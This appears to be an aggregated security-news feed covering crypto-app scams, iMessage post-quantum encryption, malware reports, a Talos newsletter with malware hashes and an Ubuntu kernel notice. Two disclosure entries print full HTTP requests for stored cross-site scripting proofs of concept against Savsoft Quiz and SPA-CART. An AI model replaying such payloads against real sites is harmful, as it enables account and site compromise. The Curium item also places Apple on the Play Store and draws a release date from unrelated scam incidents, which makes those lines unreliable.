By Uzair Amir
Meet Curium by Bluzelle, a new Miner Pool app.
This is a post from HackRead.com Read the original post: Bluzelle’s Curium App Makes Crypto Earning Effortless

Bluzelle, a Singapore-based decentralized storage company, is making it easier than ever to earn cryptocurrency with the launch of Curium, a new Miner Pool app. Curium allows anyone to contribute storage space and security to Bluzelle’s network and earn BLZ tokens in return, all from their computer or mobile device.

Traditionally, running nodes for blockchain projects has been a complex process requiring technical expertise and expensive hardware. Curium eliminates these barriers by offering a user-friendly app that works on any device, regardless of operating system.

The good news is that Bluzelle solves this by making it easy for anyone to install the Curium app on their computers or mobile devices. This app works on any operating system, including Windows, Mac, Linux, Android, or iOS. Once installed, users simply need to provide their Bluzelle wallet address.

Their device then becomes a “just in time” (JIT) storage node service provider, earning BLZ tokens for the fractional times their machine is online. This operation is similar to an Ethereum PoS pooler miner app, where anyone can install the app on their PC and start earning fractional amounts of ETH based on their device’s uptime.

However, it’s worth mentioning that users must remain alert against fake crypto apps created by scammers targeting iOS, Android, and Windows devices. Recently, Apple approved a fake wallet app on the Play Store that stole user data.

Similarly, Microsoft permitted a fake fundraising app that siphoned almost a million dollars from users. Furthermore, Google has been involved in multiple incidents where fake apps led to the theft of users’ funds. Therefore, it is significant to note that the Curium app is expected to be released by the end of 2024.

“The Curium storage node application is one of the core technologies we envisioned when we launched Bluzelle’s white paper over six years ago,” said Neeraj Murarka, co-founder and CTO of Bluzelle. “Now anyone can become part of our decentralized infrastructure network and earn rewards for simply having their device online.”

With Curium, users can contribute to the security and storage of Bluzelle’s network while earning BLZ tokens. This opens up the world of cryptocurrency to a wider audience, making it easier for anyone to participate in the Web3 revolution.

1.  **Navigating the new frontier of cryptocurrency futures**
2.  **What the Bitcoin ETF Approval Mean for the Crypto Market** 
3.  **Powerloom to Hold First Ever Node Mint on Polygon Network**
4.  **Exploring the Phenomenal Rise of Ethereum as a Digital Asset**
5.  **The Anatomy of Trading Bot Scams: Strategies for Secure Investments**

Bluzelle’s Curium App Makes Crypto Earning Effortless

By Waqas
Crypto Nightmare! Fake Rabby Wallet App Steals Millions After Apple App Store Fails to Catch It.
This is a post from HackRead.com Read the original post: Apple Approves Fake App Before Real Rabby Wallet, Users’ Funds Stolen

Users report significant losses due to the fake Rabby Wallet app, including one reporting a $5000 loss, another experiencing a 10% portfolio loss, and an NFT collector reporting $40,000 worth of ETH drained from their wallet. 

A fake version of the Rabby Wallet app, a popular crypto wallet developed by DeBank Global Pte Ltd., was tricking users and stealing their funds on the Apple App Store. DeBank’s team confirmed that any app available on the store currently is fake, as its official app is still under review and yet to be approved by Apple.

For your information, Rabby Wallet’s mobile app’s beta version was announced on 16 February by team DeBank. However, scammers acted quickly and uploaded the app’s fake version to the iOS App Store, which was a wallet drainer and had no connection with the real app.

Interestingly, this fake version was approved by Apple before the actual wallet app, prompting users to download the drainer and get scammed.

The fake Rabby Wallet app, created by a developer called “Solution Development,” appeared on the App Store under the name “Rabby Wallet & Crypto Solution” and was detected after four days. A thread warning others about the fake app was posted on Rabby Wallet’s **Apple discussion board** and **Discord** channel with screenshots from scammed users.

The fake Rabby App on the Apple App Store

Affected users have also created a thread on Reddit to warn others about the fake app. One user claimed that a fake app by “VIET LONG FINANCIAL INVESTMENT JOINT STOCK COMPANY” has been approved, causing users to lose cryptocurrencies, with a user losing around 14 ETH.

“This scammer’s approved AppStore App called “Rabby Wallet & Crypto Solution” is tricking people into thinking it is the genuine one, they enter the seed phrase or private key, and moments later all of their life savings, crypto belongings are GONE!” a user u/CryptoCurrency **wrote** on Reddit.

Rabby Wallet team **posted** a statement on X to notify users about the presence of a fake app and to avoid downloading it. The fake app has now been removed by Apple.

However, this isn’t the first instance where fake apps appeared on a credible platform like the Apple App Store and deceived users. On February 7, 2024, Hackread.com **published a warning from LastPass**, urging users to avoid downloading fraudulent applications and remain cautious after a fake app was uploaded to the Apple App Store, posing as the legitimate LastPass Password Manager app. The app was developed by Parvati Patel and closely resembled LastPass’ branding and user interface.

In July 2023, **Apple approved a fake THREADS app**, which subsequently ranked first on the European Apple Store, despite the original app being launched by META just days before and wasn’t available in Europe. Nevertheless, such incidents are steadily rising, making Apple’s app review and approval process doubtful and questionable.

****RELATED ARTICLES****

1.  **Google Deletes Fake BatteryBot Pro Malware App**
2.  **MMRat Android Trojan Uses Fake App Stores for Bank Fraud**
3.  **Fake Ledger App on Microsoft Store Stole $800,000 in Crypto**
4.  **Chinese Scammers Use Fake Loan Apps for Money Laundering**
5.  **Hackers Send Fake Rocket Alerts to Israelis via Hacked Red Alert App**

Apple Approves Fake App Before Real Rabby Wallet, Users’ Funds Stolen

By Uzair Amir
Eastern Europe is swiftly rising to prominence in the software development outsourcing sector. This ascendance is marked not…
This is a post from HackRead.com Read the original post: Top Software Development Outsourcing Trends

Eastern Europe is swiftly rising to prominence in the software development outsourcing sector. This ascendance is marked not only by its combination of cost-effectiveness and 1.3 million unparalleled talent but also by the attention it’s receiving from major companies.

Tech giants such as Google, Apple, Microsoft, and successful startups like Spotify and Slack have recognized the potential and established developer teams in the region. And what is the key to the successful establishment of a software development team in Eastern Europe?

At Alcor, we specialize in IT recruitment in EE and Latin America, concentrating primarily on middle, senior, and C-level positions. We cater to IT product companies eager to hire talent from countries like Poland, Romania, and other parts of Eastern Europe. Our commitment to bridging talent needs has positioned us as a go-to for organizations keen on leveraging the region’s tech expertise.

For a more comprehensive insight into IT outsourcing to Eastern Europe, read this article that provides a deeper dive into the region’s growing significance.

****Eastern Europe: The Undisputed IT Outsourcing Hub****

Projected global IT spending is set to reach an astonishing $4.5 trillion by 2023, as per Gartner’s recent forecast. This elevates the importance for businesses to derive maximum value from every penny spent. Validating this trend, 60% of technology companies are turning towards outsourcing partners for a certain portion of their software development needs.

While India and China have been historical leaders in IT outsourcing, there’s a notable drift towards Eastern Europe. This is driven by various factors, chief among them being the pressing concerns over Intellectual Property Rights in countries like China, accompanied by communication barriers and significant time differences. According to a comprehensive study, the Eastern European IT industry is set to grow annually by 7.84%, reaching an impressive $15.70bn by 2027. 

Several factors contribute to this shift:

*   Quality Over Quantity: Eastern Europe is gaining traction due to its emphasis on quality, ensuring that projects aren’t just completed but stand out in a competitive global market.
*   Cultural and Temporal Proximity: Eastern Europe’s closeness to Western European and North American markets means fewer time zone issues and cultural barriers. This streamlines communication and ensures smoother project executions.
*   Educated Workforce: Having over 300 higher education institutions that provide STEM programs (most of which are among the QS World University Rankings 2023), the region has plenty of highly qualified software developers.

But, what are the most significant software development trends in EE?

****A Flourishing IT Landscape in Eastern Europe****

Eastern Europe, encompassing nations such as Poland, Romania, Ukraine, Czech Republic, Hungary, Slovakia, Bulgaria, and Estonia, is swiftly emerging as a heavyweight in the international IT arena. The region’s allure is grounded in a blend of advantageous tax regimes, burgeoning IT advancements, and a vast reservoir of adept professionals. Initiatives from governments, like backing for startups and the proliferation of tech parks and innovation centers, amplify this attraction, spotlighting Eastern Europe as a potential IT powerhouse.

However, it’s the region’s multifaceted technical prowess that truly differentiates it. Poland, for example, is distinguished for its expertise in languages like JavaScript, Java, Python, and TypeScript. Romania excels with skills in PHP, C#, Java, and C++. The Czech Republic showcases deep knowledge in areas such as JavaScript, Java, PHP, and C#. Neighbouring countries like Hungary and Slovakia further enrich the tech tapestry, with commendable skills in areas spanning JavaScript, HTML/CSS, Python, Java, and PHP.

****Understanding the Tax Landscape: Poland, Romania, Bulgaria, and Ukraine****

Bulgaria stands out with its straightforward tax system. Both corporate and personal income taxes are set at a uniform rate of 10%. This simplicity is attractive to many businesses and professionals looking for clarity in fiscal matters.

Poland presents a more nuanced tax structure. CIT is typically 19%, but a reduced rate of 9% is available for smaller entities, barring certain exceptions. Individuals, on the other hand, pay 12% for income up to PLN 120,000. Beyond this threshold, they’re taxed at 32%. Additionally, high earners with an income surpassing PLN 1 million face a solidarity surcharge of 4%.

In Romania, companies face a corporate tax of 16%, while individuals are charged a 10% personal income tax. Ukraine, meanwhile, sets its corporate tax at 18%. The personal income tax is relatively low, standing at 5% for the majority, though there are specific exceptions to this rate.

****Prioritizing Cybersecurity in Outsourcing****

In an age where data breaches and cyber threats loom large, outsourcing shouldn’t be just about getting the job done but also about ensuring it’s done securely. However, IT outsourcing does not always let businesses reach complete security. There are cases when clients risk or even lose their intellectual property rights if they don’t sign an IT rights transfer agreement with their IT outsourcing firm. If they cooperate with IT recruitment or R&D providers, though, this never happens. Meanwhile, Eastern Europe, with its strong emphasis on IT education and rigorous data protection laws (GDPR), ensures that businesses aren’t just given quality work but also the peace of mind that their data remains secure.

****The Talent Over Cost Paradigm****

Although affordability is a compelling consideration, the genuine essence of value is in work quality. In the corporate realm, there’s an escalating recognition that, while trimming expenses is advantageous, skimping on talent could have long-term repercussions. This mindset is evident in Eastern Europe’s recruitment strategies, emphasizing the skills and versatility of professionals over mere hourly compensation.

Moreover, IT recruitment & R&D services companies like Alcor are setting the gold standard in IT recruitment services. Prioritizing talent ensures a symbiotic relationship where businesses get top-tier solutions, and developers get a conducive environment that nurtures their skills.

Such vendors offer IT businesses access to pre-vetted talents with their guarantee of quick and efficient hiring. Plus, software developers hired via such agencies go through a pre-screening interview stage, which boosts the overall quality of candidates. Such practices ensure businesses stay ahead of technological advances and market demands.

****Navigating the IT Talent Retention Challenge****

The global IT landscape isn’t just grappling with the complexities of outsourcing; it’s contending with a deeper issue of employee retention. As highlighted by a recent Gartner survey, a mere 29% of IT professionals express a solid intention to stick with their current roles. In the outsourcing model, frequent project shifts can sometimes make developers feel detached, leading to a decreased perception of value in their work. This transience often prompts them to seek new job opportunities.

Conversely, product-based companies tend to have a different dynamic. Here, developers aren’t just part of the solution-making process but are integral to business growth. Their roles and contributions directly influence their career trajectories and earnings. This sense of purpose and alignment with the company’s growth often translates to higher job satisfaction and longer tenure.

Top Software Development Outsourcing Trends

Useful quantum computers aren’t a reality—yet. But in one of the biggest deployments of post-quantum encryption so far, Apple is bringing the technology to iMessage.

Apple is launching its first post-quantum protections, one of the biggest deployments of the future-resistant encryption technology to date.

Billions of medical records, financial transactions, and messages we send to each other are protected by encryption. It’s fundamental to keeping modern life and the global economy running relatively smoothly. However, the decades-long race to create vastly powerful quantum computers, which could easily crack current encryption, creates new risks.

While practical quantum computing technology may still be years or decades away, security officials, tech companies, and governments are ramping up their efforts to start using a new generation of post-quantum cryptography. These new encryption algorithms will, in short, protect our current systems against any potential quantum computing-based attacks.

Today Cupertino is announcing that PQ3—its post-quantum cryptographic protocol—will be included in iMessage. The update will launch in iOS and iPad OS 17.4 and macOS 14.4 after previously being deployed in the beta versions of the software. Apple, which published the news on its security research blog, says the change is the “most significant cryptographic security upgrade in iMessage history.”

“We rebuilt the iMessage cryptographic protocol from the ground up,” its blog post says, adding that the upgrade will fully replace its existing encryption protocols by the end of this year. You don’t need to do anything other than update your operating system for the new protections to be applied.

Quantum computing is serious business. Governments in the US, China, and Russia as well as tech companies such as Google, Amazon, and IBM are plowing billions into the (still) relatively nascent efforts to create quantum computers. If successful, the technologies could help unlock scientific breakthroughs in everything from drug design to creating longer-lasting batteries. Politicians are also vying to become quantum superpowers. The current quantum computing devices are still experimental and not practical for general use.

Unlike the computers we use today, quantum computers use qubits, which can exist in more than one state. (Current bits are either ones or zeroes). It means that quantum devices can store more information than traditional computers and perform more complex calculations, including potentially cracking encryption.

“Quantum computers, if deployed reliably and in a scalable manner, would have the potential to break most of today’s cryptography,” says Lukasz Olejnik, an independent cybersecurity and privacy researcher and consultant. This includes the encryption in the messaging apps that billions of people use every day. Most encrypted messaging apps using public key cryptography have used RSA, Elliptic Curve, or Diffie-Hellman algorithms.

Responding to the potential threat—which has been known about since the 1990s—intelligence and security agencies have become increasingly vocal about developing and deploying quantum-resistant cryptography. The National Institute of Standards and Technology in the US has been a driving force behind the creation of these new encryption types. Olejnik says tech companies are taking the quantum threat “very” seriously. “Much more serious than some older changes like switches between hash functions,” Olejnik says, adding that things are moving relatively fast given that post-quantum cryptography is still “very young” and there’s “no functional quantum computer on the horizon.”

Apple’s rollout of PQ3 in iMessage follows Signal in introducing post-quantum algorithms—the encrypted messaging app introduced its PQXDH specification in September, saying it is built on the Kyber algorithm. Proton, the creator of encrypted email and other apps, said around the same time that it is building quantum-safe PGP encryption for everyone to use.

In its blog post, Apple details how PQ3 has been built and how it operates. The company says PQ3 creates a new post-quantum encryption key as part of the public keys that phones and computers using iMessage create and transmit to Apple’s servers. The company is using the Kyber algorithm—the same approach as Signal—to do this and will generate the keys from the first message that is sent, even if the person receiving the message is offline.

Apple says its setup will apply its post-quantum protections to the creation of encryption keys and the exchange of messages, including if someone’s encryption key has been compromised by an attacker. “To best protect end-to-end encrypted messaging, the post-quantum keys need to change on an ongoing basis to place an upper bound on how much of a conversation can be exposed by any single, point-in-time key compromise—both now and with future quantum computers,” the company says in its blog post.

The post-quantum protections are an addition to its existing encryption, Apple says. It is using a “hybrid design” that combines its current elliptic curve cryptography (ECC) with the newer post-quantum protections. “Defeating PQ3 security requires defeating both the existing, classical ECC cryptography and the new post-quantum primitives,” Apple writes.

Apple says PQ3 has been externally assessed by a third-party security company, which it has not named, and also two groups of academics who have written papers analyzing the system. The company argues that its approach—as it is able to issue new quantum keys—has stronger protections than Signal’s current deployment. “We conclude that this protocol achieves strong security guarantees against an active network adversary who can selectively compromise parties and has quantum computing capabilities,” a research paper led by David Basin, a computer science professor at ETH Zurich, says of PQ3.

While there’s no guarantee that quantum technologies will ever develop enough to become useful, it’s likely that the next few years will see a steady drip of companies deploying and enhancing their post-quantum protocols. In part, this is to combat one of the biggest current fears around quantum computing: that countries and threat actors are gathering and hoarding encrypted data today with the plan to unlock its secrets if quantum technologies evolve.

Starting to deploy post-quantum encryption now—before functional quantum computers exist—has the potential to limit the impact of these so-called “harvest now, decrypt later” attacks. “We are seeing our adversaries do this—copying down our encrypted data and just holding on to it,” Dustin Moody, who leads post-quantum encryption standards in the US told _The New Yorker_ in 2022. “It’s definitely a real threat.”

Apple iOS 17.4: iMessage Gets Post-Quantum Encryption in New Update

Savsoft Quiz version 6.0 Enterprise suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting# Date: 2024-01-03# Exploit Author: Eren Sen# Vendor: SAVSOFT QUIZ# Vendor Homepage: https://savsoftquiz.com# Software Link: https://savsoftquiz.com/web/index.php/online-demo/# Version: < 6.0# CVE-ID: N/A# Tested on: Kali Linux / Windows 10# Vulnerabilities Discovered Date : 2024/01/03# Persistent Cross Site Scripting (XSS) Vulnerability# Vulnerable Parameter Type: POST# Vulnerable Parameter: quiz_name# Proof of Concepts:https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13# HTTP Request:POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1Host: demos1.softaculous.comCookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxxContent-Length: 411Cache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1Origin: https://demos1.softaculous.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_newAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closequiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=

Savsoft Quiz 6.0 Enterprise Cross Site Scripting

SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

A group of cybercriminals is committing bank fraud by convincing victims to scan their IDs and faces.

Well, the GoldPickaxe Trojan does not literally steal your face, but it does steal an image of your face in order to be able to identify as you.

Researchers have found a family of Trojans, attributed to a financially motivated Chinese group, which come in versions for iOS and Android.

Cybercriminals try to trick victims into scanning their faces along with identification documents. The victims are approached through phishing and smishing messages claiming to be from local governments or other trusted sources. They ask the target to install a fake government service app.

At this stage there is a crossroads where Android and iOS infections are different. While Android users go straight to the malicious app, due to measures taken by Apple the criminals ask the iOS users to install a disguised Mobile Device Management (MDM) profile. MDM allows a controller to remotely configure devices by sending profiles and commands to the device. As such MDM offers a wide range of features such as remote wipe, device tracking, and application management, which the cybercriminals take advantage of to install malicious applications and obtain the information they need.

The criminals then request that the victim take a photo of an official ID and scan their face with the app. Additionally, the criminals request the target’s phone number in order to get more details about them, particularly their bank accounts.

Once the criminals have a scan of the face they can use artificial intelligence (AI) to perform face-swaps. Face swapping is a technique that allows you to replace faces in images with others.

With the face swap and the photo of the ID the criminals can identify themselves as the victim to the victim’s bank and withdraw funds from their account. Many financial organizations use facial recognition for transaction verification and login authentication. Although the researchers found no evidence that bank fraud was the goal of the cybercriminals, their story was confirmed by warnings from the Thai police.

Although this group is mainly active in Asia, more precisely in Thailand, it makes sense to expect such a successful method to be copied.

Malwarebytes and ThreatDown solutions detect the GoldPickaxe Trojan as Android/Trojan.Agent.prn1.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 GoldPickaxe Trojan steals your face! 

Several companies operating in the cryptocurrency sector are the target of a newly discovered Apple macOS backdoor codenamed RustDoor.
RustDoor was first documented by Bitdefender last week, describing it as a Rust-based malware capable of harvesting and uploading files, as well as gathering information about the infected machines. It's distributed by masquerading itself as a Visual

RustDoor macOS Backdoor Targets Cryptocurrency Firms with Fake Job Offers

There was about a 24-hour period where many news outlets reported on a reported DDoS attack that involved a botnet made up of thousands of internet-connected toothbrushes.

Thursday, February 15, 2024 14:00

I’ll be the first to admit that, like many people on the internet last week, I got caught up in the toothbrush distributed denial-of-service attack that wasn’t.  

I had a whole section on it written up in last week’s newsletter, and then I came across Graham Cluley’s blog post debunking the whole thing, and I had to delete it about an hour before the newsletter went live.  

There was about a 24-hour period where many news outlets reported on a reported DDoS attack that involved a botnet made up of thousands of internet-connected toothbrushes, it all started with one international newspaper report, and then was aggregated to death and spread quickly on social media.  

This attack was only a _hypothetical_ that a security researcher posed in an interview but was reported or translated as an attack that happened. 

To me, I think we can all learn from a few major takeaways from this entire saga — myself included.  

It’s easy to see why this was a ready-made story to go viral: It involved a silly device that probably doesn’t need to be connected to the internet anyway, it involved a large number that would grab headlines and it was a DDoS attack, which have suddenly come back in vogue over the past year. 

But, I’ll admit, the aggregated stories seemed a little fishy to me at first, because all the reports didn’t include any specifics about which company was targeted, how long the attack lasted, or the name of the device that was reportedly compromised. 

That last part should be a red flag going forward for any of us wanting to share a meme about something the next time a cybersecurity story goes viral — in my opinion, responsible disclosure of an attack or compromise should always include information about whatever vulnerability it was that was exploited. In this hypothetical scenario, I don’t think an adversary would have been able to compromise an internet-connected toothbrush without first exploiting some sort of vulnerability, which if it’s being reported on in public, should at least include information on patches or mitigations. 

I also think we all need to be asking the fundamental question: Why? In this case, I should have asked myself why an attacker would want to go through the trouble of compromising smart toothbrushes. And what would be the end goal of targeting a private company with a DDoS attack? Likely, it would be to demand a ransom in exchange for the attacker stopping the attack, but without knowing what sector the targeted company was in, it’s tough to guess how profitable that might even be. (For example, a health care agency may be looking to do anything to get back to operating asap, as lives could literally be at stake.) 

And once the attacker compromised a toothbrush, what information can they glean from the user besides their dental hygiene habits? Usually, they’d be looking to steal some sort of personal information, login credentials or financial data that they could then turn around and sell on the dark web. 

Needless to say, there were multiple red flags we all ignored when this story started to spread. And I’m not here to blame anyone in this case; it was all honest mistakes that, all things considered, ended up not being that serious. But the toothbrush botnet that wasn’t does serve as a reminder to all of us to be a bit more mindful before clicking share or posting a story on social media.  

**The one big thing **

Cisco Talos has identified a new backdoor authored and operated by the Turla APT group, a Russian cyber espionage threat group. This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation. Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems. 

**Why do I care? **

Turla has been widely known to target entities across the world using a huge set of offensive tools in geographies including the U.S., European Union, Ukraine and Asia. They’ve previously used malware families such as CAPIBAR and KAZUAR to target Ukrainian defense forces. After Crutch and TinyTurla, Turla has now expanded their arsenal to include the TinyTurla-NG and TurlaPower-NG malware families, while also widening its net of targets to NGOs. 

**So now what? **

Talos has released new ClamAV signatures and Snort rules to protect against TinyTurla and the actors’ actions. We don’t know what the initial access vector is, so it’s tough to give targeted advice on how to avoid this malware, but having any endpoint detection in place will block this “last chance” backdoor.  

**Top security headlines of the week **

**Chinese state-sponsored actor Volt Typhoon may have silently sat on U.S. critical infrastructure networks for more than five years,** according to a new report from American intelligence agencies. According to the advisory, the infamous hacking group has been exploiting vulnerabilities in routers, firewalls and VPNs to target water, transportation, energy and communications systems across the country. Volt Typhoon has been able to control some victims’ surveillance camera systems, and the access could have allowed them to disrupt critical energy and water controls. The actor is known for using living-off-the-land binaries (LoLBins) to remain undetected once they gain an initial foothold. Authorities in Canada, Australia and New Zealand also contributed to last week’s advisory, citing their concern for similar activity in their countries. The FBI’s director recently said in testimony to U.S. Congress that authorities had dismantled a bot network of hundreds of compromised devices that was connected to VoltTyphoon. (Axios, The Guardian) 

**A new spyware network called TheTruthSpy may have compromised hundreds of Android devices using silent tracking apps that users download thinking they’re legitimate.** Security researchers uncovered the information of thousands of devices that have already been compromised, including their IMEI numbers and advertising IDs. TheTruthSpy appears to actively spy on large clusters of victims across Europe, India, Indonesia, the U.S. and U.K. The operators behind TheTruthSpy also did not address a security vulnerability in the software, identified as CVE-2022-0732, which left the victim data they stole potentially vulnerable to other bad actors. These types of stalkerware tools are often used by family members, spouses or peers of victims who want to track their physical locations and spy on messages and phone calls. The spyware is downloaded via an app, which doesn’t appear on the victim’s home screen and operates quietly in the background. (TechCrunch, maia blog) 

**Apple removed a fake LastPass app called “LassPass” after the popular password management service reported it.** The phony LassPass used a similar logo to that of the legitimate LastPass and was up on the App Store for an unknown amount of time. Apple also said it was removing the creator of the app from its Developer Program. This is a very rare case for the Apple App Store, as it has a strict review policy. LastPass released a warning to all users last week of the fake app’s existence, including a link to the legitimate LastPass app. LassPass only had one review on the store, and multiple reviews warning it was fake. However, it’s safe to assume that the app was likely set up as some sort of phishing scam meant to get users to enter their legitimate LastPass login information to be stolen by the fake app’s creator. (Ars Technica, Bleeping Computer) 

**Can’t get enough Talos? **

*   Beers with Talos Ep. #143: The Reddit security diaries 
*   The Need to Know: How are attackers using QR codes in phishing emails and lure documents? 
*   First Microsoft Patch Tuesday zero-day of 2024 disclosed as part of group of 75 vulnerabilities 

**Upcoming events where you can find Talos **

**S4x24** **(March 4 - 27)** 

Miami Beach, Florida 

_To protect themselves during Russian aggression, the Ukrainian military utilizes electronic warfare to blanket critical infrastructure to defeat radar and GPS-guided smart munitions. This has the unintended consequence of disrupting GPS synchrophasor clock measurements and creating service outages on an already beleaguered and damaged transmission electric grid. Joe Marshall from Talos’ Strategic Communications team will tell an incredible story of how a group of engineers and security professionals from a diverse coalition of organizations came together to solve this electronic warfare GPS problem in an unconventional technical way, and helped stabilize parts of the transmission grid of Ukraine._ 

**RSA** **(May 6 - 9)** 

_San Francisco, California_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1      
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515      
**Typical Filename:** IMG001.exe      
**Claimed Product:** N/A      
**Detection Name:** Win.Dropper.Coinminer::1201 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa     
**MD5:** df11b3105df8d7c70e7b501e210e3cc3     
**Typical Filename:** DOC001.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e   
**MD5:** 040cd888e971f2872d6d5dafd52e6194   
**Typical Filename:** tmp000c3787   
**Claimed Product:** Ultra Virus Killer   
**Detection Name:** PUA.Win.Virus.Ultra::95.sbx.tg

Why the toothbrush DDoS story fooled us all

Ubuntu Security Notice 6639-1 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

